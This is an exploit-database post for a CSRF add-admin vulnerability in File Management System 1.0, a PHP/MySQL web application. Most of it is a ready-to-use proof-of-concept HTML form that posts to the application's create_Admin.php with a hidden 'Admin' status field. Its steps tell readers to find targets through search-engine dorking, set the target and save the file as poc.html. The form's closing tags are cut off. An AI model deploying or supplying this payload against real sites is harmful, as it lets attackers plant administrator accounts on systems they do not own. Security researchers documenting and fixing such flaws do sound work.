Share
## https://sploitus.com/exploit?id=PACKETSTORM:181232
=============================================================================================================================================
| # Title : File Management System 1.0 CSRF Add Admin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181 |
=============================================================================================================================================
poc :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Line 1 : Set your target.
[+] Save As poc.html
[+] Payload :
<form action="http://127.0.0.1/filemanagement/Private_Dashboard/create_Admin.php" method="POST">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-header text-center">
<h4 class="modal-title w-100 font-weight-bold"><i class="fas fa-user-plus"></i> Add Admin</h4>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body mx-3">
<div class="md-form mb-5">
<input type="hidden" id="orangeForm-name" name="status" value = "Admin" class="form-control validate">
</div>
<div class="md-form mb-5">
<i class="fas fa-user prefix grey-text"></i>
<input type="text" id="orangeForm-name" name="name" class="form-control validate" required="">
<label data-error="wrong" data-success="right" for="orangeForm-name">Your name</label>
</div>
<div class="md-form mb-5">
<i class="fas fa-envelope prefix grey-text"></i>
<input type="email" id="orangeForm-email" name="admin_user" class="form-control validate" required="">
<label data-error="wrong" data-success="right" for="orangeForm-email">Your email</label>
</div>
<div class="md-form mb-4">
<i class="fas fa-lock prefix grey-text"></i>
<input type="password" id="orangeForm-pass" name="admin_password" class="form-control validate" required="">
<label data-error="wrong" data-success="right" for="orangeForm-pass">Your password</label>
</div>
</div>
<div class="modal-footer d-flex justify-content-center">
<button class="btn btn-info" name="reg">Sign up</button>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================